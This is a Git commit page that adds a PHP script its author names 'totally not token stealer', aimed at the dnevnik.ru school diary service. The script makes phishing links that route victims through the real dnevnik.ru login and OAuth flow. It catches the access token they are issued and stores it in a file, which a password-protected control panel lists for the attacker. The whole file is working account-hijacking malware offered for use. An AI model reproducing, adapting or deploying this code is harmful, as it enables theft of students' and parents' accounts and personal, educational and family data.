initial
Some checks failed
Build and Release / build-and-release (push) Failing after 8s

This commit is contained in:
2026-05-28 15:03:31 +03:00
commit ce0d14bd77
9 changed files with 1537 additions and 0 deletions

243
script.php Normal file
View File

@@ -0,0 +1,243 @@
<?php
// totally not token stealer
// for dnevnik.ru
// =========================
// by ktkz for tmb project
// 2026
// go to .php?control to open control panel
// ===CONFIG===
const PANEL_PASSWORD = "TOTALLYNOTSTEALERpassword1";
const DATA_FILE_PATH = "./totallynotstealeddata.php";
const AUTH_URL = "https://login.dnevnik.ru/login/?ReturnUrl=";
const OAUTH_URL = "https://login.dnevnik.ru/oauth2?response_type=token&client_id=b8006d75-70a9-4291-885c-13d8511bb2ae&scope=CommonInfo,EducationalInfo,FriendsAndRelatives&redirect_uri=";
// ============
// ===PAGES===
// NOTE: contains ai-generated styles and mine shitty while state-of-art template system
// we use builder to mount these
function LOGIN_PAGE(string $data)
{
return "<<BUILDER_MOUNT_FILE_(.\dev\html\login.html)>>";
}
function CONTROL_PAGE(string $data)
{
return "<<BUILDER_MOUNT_FILE_(.\dev\html\control.html)>>";
}
// ===========
// PREPARATION
if (!file_exists(DATA_FILE_PATH)) {
file_put_contents(
DATA_FILE_PATH,
'<?php // { "name": "tnts", "version": 1, "data": [] }',
);
}
// ROUTER
function path(string $p)
{
return count($_GET) > 0 && array_keys($_GET)[0] == $p;
}
if (path("control")) {
if (!isset($_GET["l"]) || $_GET["l"] == "") {
echo LOGIN_PAGE("{}");
exit();
}
if ($_GET["l"] != PANEL_PASSWORD) {
echo LOGIN_PAGE('{error: "wrong password"}');
exit();
}
// user authorized
if (!in_array("do", array_keys($_GET))) {
$config = readConfig();
$error = "";
if (isset($_GET["error"])) {
$error = $_GET["error"];
}
echo CONTROL_PAGE(
json_encode([
"password" => $_GET["l"],
"data" => $config,
"error" => $error,
]),
);
exit();
}
}
function readConfig()
{
$_ = json_decode(
str_replace("<?php // ", "", file_get_contents(DATA_FILE_PATH)),
true,
);
if ($_["name"] != "tnts" || !isset($_["data"])) {
exit();
}
return $_["data"];
}
function saveConfig(array $config)
{
$_ = ["name" => "tnts", "version" => 1, "data" => $config];
file_put_contents(DATA_FILE_PATH, "<?php // " . json_encode($_));
}
// config type
// {
// {
// "name": string,
// "url": string,
// "comment": string?,
// "token": string?
// }
// }
//
// define status by token presence
if (
isset($_GET["do"]) &&
$_GET["do"] === "create" &&
isset($_GET["url"]) &&
isset($_GET["name"])
) {
if (!isset($_GET["l"]) || $_GET["l"] == "" || $_GET["l"] != PANEL_PASSWORD) {
exit();
}
// create link
$url = $_GET["url"];
$name = $_GET["name"];
$comment = $_GET["comment"] ?? null;
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] === $name,
),
);
if (count($matches) != 0) {
header(
"Location: " .
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
"?control&l=" .
$_GET["l"] .
"&error=" .
urlencode("url already exists"),
true,
302,
);
exit();
}
$config[] = [
"name" => $name,
"url" => $url,
"comment" => $comment,
"token" => null,
];
saveConfig($config);
header(
"Location: " .
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
"?control&l=" .
$_GET["l"],
true,
302,
);
}
if (isset($_GET["do"]) && $_GET["do"] === "delete" && isset($_GET["delete"])) {
if (!isset($_GET["l"]) || $_GET["l"] == "" || $_GET["l"] != PANEL_PASSWORD) {
exit();
}
$name = $_GET["delete"];
$config = readConfig();
$config = array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] != $name,
);
saveConfig($config);
header(
"Location: " .
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
"?control&l=" .
$_GET["l"],
true,
302,
);
exit();
}
function getBaseUrl(): string
{
$scheme =
!empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http";
$host = $_SERVER["HTTP_HOST"] ?? ($_SERVER["SERVER_NAME"] ?? "");
$script = $_SERVER["SCRIPT_NAME"] ?? ($_SERVER["PHP_SELF"] ?? "");
return $scheme . "://" . $host . $script;
}
if (isset($_GET["go"])) {
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] == $_GET["go"],
),
);
if (count($matches) == 0) {
exit();
}
$goUrl = getBaseUrl() . "?callback&name=" . $_GET["go"];
$redirect = AUTH_URL . rawurlencode(OAUTH_URL . rawurlencode($goUrl));
header("Location: " . $redirect, true, 302);
exit();
}
if (path("info")) {
header("Content-type: application/json");
echo json_encode([
"name" => "totally not token stealer",
"version" => "1.0.0",
"author" => "ktkz",
]);
}
if (path("callback") && isset($_GET["name"])) {
$base = parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH);
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] == $_GET["name"],
),
);
if (count($matches) == 0) {
exit();
}
$send_url = $base . "?send&name=" . $_GET["name"];
$redirect_url = $matches[0]["url"];
echo "<<BUILDER_MOUNT_FILE_(.\dev\html\callback.html)>>";
exit();
}
if (path("send") && isset($_GET["name"]) && isset($_GET["token"])) {
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] == $_GET["name"],
),
);
if (count($matches) == 0) {
exit();
}
$config[array_search($matches[0], $config)]["token"] = $_GET["token"];
saveConfig($config);
}